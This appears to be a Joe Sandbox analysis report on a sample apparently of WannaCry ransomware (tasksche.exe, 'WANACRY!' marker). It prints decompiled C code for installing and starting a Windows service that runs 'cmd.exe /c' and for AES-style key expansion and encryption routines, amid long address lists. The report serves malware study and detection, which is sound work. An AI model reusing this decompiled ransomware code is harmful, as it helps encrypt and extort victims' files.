                    0x00406c40
                    0x00406c40
                    0x00406c4c
                    0x00406c4f
                    0x00406c52
                    0x00406c56
                    0x00406c59
                    0x00407064
                    0x00000000
                    0x00407064
                    0x00406c5f
                    0x00406c64
                    0x00000000
                    0x00000000
                    0x00406c6d
                    0x00406c70
                    0x00406c75
                    0x00406c75
                    0x00406c7c
                    0x00406c7f
                    0x00406ca0
                    0x00406cec
                    0x00406cf1
                    0x00406cfa
                    0x00406cfa
                    0x00406cff
                    0x00406d21
                    0x00406d3e
                    0x00406d52
                    0x00406d5c
                    0x00406d89
                    0x00000000
                    0x00406d89
                    0x00406d5e
                    0x00406d61
                    0x00406d68
                    0x00406d7e
                    0x00406d95
                    0x00406d9b
                    0x00406dab
                    0x00406db0
                    0x00406db8
                    0x00406dbe
                    0x00406dbe
                    0x00406dbe
                    0x00406dc2
                    0x00000000
                    0x00000000
                    0x00406dd0
                    0x00406dd6
                    0x00000000
                    0x00406dd9
                    0x00406ddf
                    0x00406de5
                    0x00406e11
                    0x00406e11
                    0x00406e11
                    0x00000000
                    0x00406e11
                    0x00406ded
                    0x00406df3
                    0x00000000
                    0x00000000
                    0x00406dfb
                    0x00406e01
                    0x00000000
                    0x00000000
                    0x00406e09
                    0x00406e0f
                    0x00406e1b
                    0x00406e20
                    0x00406e28
                    0x00406e2c
                    0x00406e3c
                    0x00406e3e
                    0x00406e41
                    0x00406e44
                    0x00406e46
                    0x00406e61
                    0x00406e6b
                    0x00406e6d
                    0x00406e78
                    0x00406e7a
                    0x00406e7c
                    0x00406e7c
                    0x00406e7e
                    0x00406e82
                    0x00406e88
                    0x00406e8a
                    0x00406e8a
                    0x00406e96
                    0x00406e98
                    0x00406e98
                    0x00406ea3
                    0x00406ea5
                    0x00406ea5
                    0x00406eae
                    0x00406eb0
                    0x00406eb0
                    0x00406ebb
                    0x00406ebd
                    0x00406ebd
                    0x00406eca
                    0x00406ed3
                    0x00406ee6
                    0x00406ef2
                    0x00406ef5
                    0x00406efb
                    0x00406efe
                    0x00406f05
                    0x00406f08
                    0x00406f0e
                    0x00406f14
                    0x00406f1a
                    0x00406f20
                    0x00406f26
                    0x00406f2c
                    0x00407037
                    0x00407039
                    0x0040703b
                    0x0040703c
                    0x00407041
                    0x00407048
                    0x0040704f
                    0x0040705a
                    0x00000000
                    0x00406f32
                    0x00406f32
                    0x00406f3a
                    0x00406f41
                    0x00406f45
                    0x00406f4d
                    0x00406f5d
                    0x00000000
                    0x00000000
                    0x00406f62
                    0x00406f6c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406f6e
                    0x00406f73
                    0x00406f81
                    0x00406f86
                    0x00406f89
                    0x00406f8f
                    0x00406f92
                    0x00406f94
                    0x00406f99
                    0x00406f9e
                    0x00406fba
                    0x00406fc0
                    0x00406fc4
                    0x00406fc4
                    0x00406fcc
                    0x00406fce
                    0x00406fd3
                    0x00406fd8
                    0x00406ff4
                    0x00406ffb
                    0x00406ffb
                    0x00407005
                    0x00407007
                    0x0040702a
                    0x00407031
                    0x00407031
                    0x00000000
                    0x00407005
                    0x00406f2c
                    0x00000000
                    0x00406e0f
                    0x00406dd0
                    0x00406dcb
                    0x00000000
                    0x00406dcb
                    0x00406d80
                    0x00406d83
                    0x00000000
                    0x00406d88
                    0x00000000
                    0x00406d40
                    0x00406d02
                    0x00406cf9
                    0x00406cf9
                    0x00000000
                    0x00406cf9
                    0x00406cf4
                    0x00000000
                    0x00406cf4
                    0x00000000
                    0x00406c81
                    0x00406c83
                    0x00406ca2
                    0x00406ca7
                    0x00406caa
                    0x00406cae
                    0x00406cb1
                    0x00406cb7
                    0x00406cbd
                    0x00406cc3
                    0x00406cc9
                    0x00406ccf
                    0x00406cd5
                    0x00406cdb
                    0x00406ce1
                    0x00407060
                    0x00000000
                    0x00407060
                    0x00406c91
                    0x00000000
                    0x00406c96

                    APIs
                    • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: memcpy
                    • String ID: /../$/..\$\../$\..\
                    • API String ID: 3510742995-3885502717
                    • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                    • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
                    • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                    • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401CE8(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v1040;
				void* _t12;
				void* _t13;
				void* _t31;
				int _t32;

				_v12 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_v8 = _t12;
				if(_t12 != 0) {
					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
					_v16 = _t13;
					if(_t13 == 0) {
						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
						if(_t31 != 0) {
							StartServiceA(_t31, 0, 0);
							CloseServiceHandle(_t31);
							_v12 = 1;
						}
						_t32 = _v12;
					} else {
						StartServiceA(_t13, 0, 0);
						CloseServiceHandle(_v16);
						_t32 = 1;
					}
					CloseServiceHandle(_v8);
					return _t32;
				}
				return 0;
			}











                    0x00401cfb
                    0x00401cfe
                    0x00401d06
                    0x00401d09
                    0x00401d21
                    0x00401d29
                    0x00401d2c
                    0x00401d54
                    0x00401d7b
                    0x00401d7f
                    0x00401d84
                    0x00401d8b
                    0x00401d91
                    0x00401d91
                    0x00401d98
                    0x00401d2e
                    0x00401d31
                    0x00401d3a
                    0x00401d42
                    0x00401d42
                    0x00401d9e
                    0x00000000
                    0x00401da7
                    0x00000000

                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                    • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                    • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                    • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpen$ManagerStart
                    • String ID: cmd.exe /c "%s"
                    • API String ID: 1485051382-955883872
                    • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                    • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                    • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                    • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 54%
                    			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
				signed int _v8;
				signed int _v12;
				char _v24;
				int _t193;
				signed int _t198;
				int _t199;
				intOrPtr _t200;
				signed int* _t205;
				signed char* _t206;
				signed int _t208;
				signed int _t210;
				signed int* _t216;
				signed int _t217;
				signed int* _t220;
				signed int* _t229;
				void* _t252;
				void* _t280;
				void* _t281;
				signed int _t283;
				signed int _t289;
				signed int _t290;
				signed char* _t291;
				signed int _t292;
				void* _t303;
				void* _t313;
				intOrPtr* _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char* _t317;
				signed char* _t319;
				signed int _t320;
				signed int _t322;
				void* _t326;
				void* _t327;
				signed int _t329;
				signed int _t337;
				intOrPtr _t338;
				signed int _t340;
				intOrPtr _t341;
				void* _t342;
				signed int _t345;
				signed int* _t346;
				signed int _t347;
				void* _t352;
				void* _t353;
				void* _t354;

				_t352 = __ecx;
				if(_a4 == 0) {
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t283 = _a12;
				_t252 = 0x18;
				_t342 = 0x10;
				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t193 = _a16;
				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_t193 =  &_v24;
					_push(0x40d570);
					_push(_t193);
					L0040776E();
				}
				 *(_t352 + 0x3cc) = _t193;
				 *(_t352 + 0x3c8) = _t283;
				memcpy(_t352 + 0x3d0, _a8, _t193);
				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
				_t198 =  *(_t352 + 0x3c8);
				_t354 = _t353 + 0x18;
				if(_t198 == _t342) {
					_t199 =  *(_t352 + 0x3cc);
					if(_t199 != _t342) {
						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
					} else {
						_t200 = 0xa;
					}
					goto L17;
				} else {
					if(_t198 == _t252) {
						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
						L17:
						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
						L18:
						asm("cdq");
						_t289 = 4;
						_t326 = 0;
						_a12 =  *(_t352 + 0x3cc) / _t289;
						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
							L23:
							_t327 = 0;
							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
								L28:
								asm("cdq");
								_t290 = 4;
								_t291 = _a4;
								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
								_v12 = _t345;
								_t329 =  *(_t352 + 0x3c8) / _t290;
								_t205 = _t352 + 0x414;
								_v8 = _t329;
								if(_t329 <= 0) {
									L31:
									_a8 = _a8 & 0x00000000;
									if(_t329 <= 0) {
										L35:
										if(_a8 >= _t345) {
											L51:
											_t206 = 1;
											_a16 = _t206;
											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
												L57:
												 *((char*)(_t352 + 4)) = 1;
												return _t206;
											}
											_a8 = _t352 + 0x208;
											do {
												_t292 = _a12;
												if(_t292 <= 0) {
													goto L56;
												}
												_t346 = _a8;
												do {
													_t208 =  *_t346;
													_a4 = _t208;
													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
													_t346 =  &(_t346[1]);
													_t292 = _t292 - 1;
												} while (_t292 != 0);
												L56:
												_a16 =  &(_a16[1]);
												_a8 = _a8 + 0x20;
												_t206 = _a16;
											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
											goto L57;
										}
										_a16 = 0x40bbfc;
										do {
											_t210 =  *(_t352 + 0x410 + _t329 * 4);
											_a4 = _t210;
											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
											_a16 = _a16 + 1;
											if(_t329 == 8) {
												_t216 = _t352 + 0x418;
												_t303 = 3;
												do {
													 *_t216 =  *_t216 ^  *(_t216 - 4);
													_t216 =  &(_t216[1]);
													_t303 = _t303 - 1;
												} while (_t303 != 0);
												_t217 =  *(_t352 + 0x420);
												_a4 = _t217;
												_t220 = _t352 + 0x428;
												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
												_t313 = 3;
												do {
													 *_t220 =  *_t220 ^  *(_t220 - 4);
													_t220 =  &(_t220[1]);
													_t313 = _t313 - 1;
												} while (_t313 != 0);
												L46:
												_a4 = _a4 & 0x00000000;
												if(_t329 <= 0) {
													goto L50;
												}
												_t314 = _t352 + 0x414;
												while(_a8 < _t345) {
													asm("cdq");
													_t347 = _a8 / _a12;
													asm("cdq");
													_t337 = _a8 % _a12;
													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
													_a4 = _a4 + 1;
													_t345 = _v12;
													_t338 =  *_t314;
													_t314 = _t314 + 4;
													_a8 = _a8 + 1;
													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
													_t329 = _v8;
													if(_a4 < _t329) {
														continue;
													}
													goto L50;
												}
												goto L51;
											}
											if(_t329 <= 1) {
												goto L46;
											}
											_t229 = _t352 + 0x418;
											_t315 = _t329 - 1;
											do {
												 *_t229 =  *_t229 ^  *(_t229 - 4);
												_t229 =  &(_t229[1]);
												_t315 = _t315 - 1;
											} while (_t315 != 0);
											goto L46;
											L50:
										} while (_a8 < _t345);
										goto L51;
									}
									_t316 = _t352 + 0x414;
									while(_a8 < _t345) {
										asm("cdq");
										_a4 = _a8 / _a12;
										asm("cdq");
										_t340 = _a8 % _a12;
										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
										_a8 = _a8 + 1;
										_t341 =  *_t316;
										_t316 = _t316 + 4;
										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
										_t329 = _v8;
										if(_a8 < _t329) {
											continue;
										}
										goto L35;
									}
									goto L51;
								}
								_a8 = _t329;
								do {
									_t317 =  &(_t291[1]);
									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
									_t319 =  &(_t317[2]);
									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
									_t291 =  &(_t319[1]);
									_t205 =  &(_t205[1]);
									_t60 =  &_a8;
									 *_t60 = _a8 - 1;
								} while ( *_t60 != 0);
								goto L31;
							}
							_t280 = _t352 + 0x1e8;
							do {
								_t320 = _a12;
								if(_t320 > 0) {
									memset(_t280, 0, _t320 << 2);
									_t354 = _t354 + 0xc;
								}
								_t327 = _t327 + 1;
								_t280 = _t280 + 0x20;
							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
							goto L28;
						}
						_t281 = _t352 + 8;
						do {
							_t322 = _a12;
							if(_t322 > 0) {
								memset(_t281, 0, _t322 << 2);
								_t354 = _t354 + 0xc;
							}
							_t326 = _t326 + 1;
							_t281 = _t281 + 0x20;
						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
						goto L23;
					}
					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
					goto L18;
				}
			}

















































                    0x00402a83
                    0x00402a85
                    0x00402a8e
                    0x00402a95
                    0x00402a9e
                    0x00402aa3
                    0x00402aa4
                    0x00402aa4
                    0x00402aa9
                    0x00402aae
                    0x00402ab1
                    0x00402ab4
                    0x00402ac2
                    0x00402ac6
                    0x00402acd
                    0x00402ad6
                    0x00402adb
                    0x00402adc
                    0x00402adc
                    0x00402ae1
                    0x00402ae6
                    0x00402af4
                    0x00402af8
                    0x00402aff
                    0x00402b05
                    0x00402b08
                    0x00402b0d
                    0x00402b0e
                    0x00402b0e
                    0x00402b14
                    0x00402b23
                    0x00402b2a
                    0x00402b3f
                    0x00402b44
                    0x00402b4a
                    0x00402b4f
                    0x00402b75
                    0x00402b7d
                    0x00402b92
                    0x00402b7f
                    0x00402b81
                    0x00402b81
                    0x00000000
                    0x00402b51
                    0x00402b53
                    0x00402b70
                    0x00402b94
                    0x00402b94
                    0x00402b9a
                    0x00402ba2
                    0x00402ba3
                    0x00402ba6
                    0x00402bae
                    0x00402bb1
                    0x00402bcf
                    0x00402bcf
                    0x00402bd7
                    0x00402bf8
                    0x00402c00
                    0x00402c01
                    0x00402c0b
                    0x00402c0e
                    0x00402c12
                    0x00402c15
                    0x00402c17
                    0x00402c1f
                    0x00402c22
                    0x00402c4e
                    0x00402c4e
                    0x00402c54
                    0x00402ca5
                    0x00402ca8
                    0x00402e04
                    0x00402e06
                    0x00402e0d
                    0x00402e10
                    0x00402e73
                    0x00402e73
                    0x00402e7b
                    0x00402e7b
                    0x00402e18
                    0x00402e1b
                    0x00402e1b
                    0x00402e20
                    0x00000000
                    0x00000000
                    0x00402e22
                    0x00402e25
                    0x00402e25
                    0x00402e29
                    0x00402e59
                    0x00402e5b
                    0x00402e5e
                    0x00402e5e
                    0x00402e61
                    0x00402e61
                    0x00402e64
                    0x00402e68
                    0x00402e6b
                    0x00000000
                    0x00402e1b
                    0x00402cae
                    0x00402cb5
                    0x00402cb5
                    0x00402cbf
                    0x00402d05
                    0x00402d0b
                    0x00402d11
                    0x00402d34
                    0x00402d3a
                    0x00402d3b
                    0x00402d3e
                    0x00402d40
                    0x00402d43
                    0x00402d43
                    0x00402d46
                    0x00402d4e
                    0x00402d8f
                    0x00402d95
                    0x00402d9b
                    0x00402d9c
                    0x00402d9f
                    0x00402da1
                    0x00402da4
                    0x00402da4
                    0x00402da7
                    0x00402da7
                    0x00402dad
                    0x00000000
                    0x00000000
                    0x00402daf
                    0x00402db5
                    0x00402dbf
                    0x00402dc3
                    0x00402dc8
                    0x00402dc9
                    0x00402dcf
                    0x00402ddb
                    0x00402dde
                    0x00402de4
                    0x00402de6
                    0x00402de9
                    0x00402dec
                    0x00402df3
                    0x00402df9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402df9
                    0x00000000
                    0x00402db5
                    0x00402d16
                    0x00000000
                    0x00000000
                    0x00402d1c
                    0x00402d22
                    0x00402d25
                    0x00402d28
                    0x00402d2a
                    0x00402d2d
                    0x00402d2d
                    0x00000000
                    0x00402dfb
                    0x00402dfb
                    0x00000000
                    0x00402cb5
                    0x00402c56
                    0x00402c5c
                    0x00402c6a
                    0x00402c6e
                    0x00402c74
                    0x00402c75
                    0x00402c7e
                    0x00402c8b
                    0x00402c91
                    0x00402c93
                    0x00402c96
                    0x00402c9d
                    0x00402ca3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402ca3
                    0x00000000
                    0x00402c5c
                    0x00402c24
                    0x00402c27
                    0x00402c2d
                    0x00402c2e
                    0x00402c36
                    0x00402c3f
                    0x00402c43
                    0x00402c45
                    0x00402c46
                    0x00402c49
                    0x00402c49
                    0x00402c49
                    0x00000000
                    0x00402c27
                    0x00402bd9
                    0x00402bdf
                    0x00402bdf
                    0x00402be4
                    0x00402bea
                    0x00402bea
                    0x00402bea
                    0x00402bec
                    0x00402bed
                    0x00402bf0
                    0x00000000
                    0x00402bdf
                    0x00402bb3
                    0x00402bb6
                    0x00402bb6
                    0x00402bbb
                    0x00402bc1
                    0x00402bc1
                    0x00402bc1
                    0x00402bc3
                    0x00402bc4
                    0x00402bc7
                    0x00000000
                    0x00402bb6
                    0x00402b55
                    0x00000000
                    0x00402b55

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
                    • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
                    • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
                    • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
                    • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
                    • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrow$memcpy
                    • String ID:
                    • API String ID: 1881450474-3916222277
                    • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                    • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                    • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                    • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004014A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178filememoryCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                    • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                    • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                    • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                    • String ID: WANACRY!
                    • API String ID: 283026544-1240840912
                    • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                    • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                    • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                    • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 55%
                    			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E00402E7E(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x28;
					do {
						if(_t274 > 0) {
							_t34 =  &_v28; // 0x403b51
							_t260 =  *_t34;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_t100 =  &_v28; // 0x403b51
					_v44 =  *_t100 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                    0x00403517
                    0x0040351e
                    0x00403528
                    0x00403531
                    0x00403536
                    0x00403537
                    0x00403537
                    0x0040353c
                    0x00403545
                    0x00000000
                    0x0040354f
                    0x0040355b
                    0x0040355c
                    0x0040355d
                    0x0040355f
                    0x0040356e
                    0x00403572
                    0x0040357d
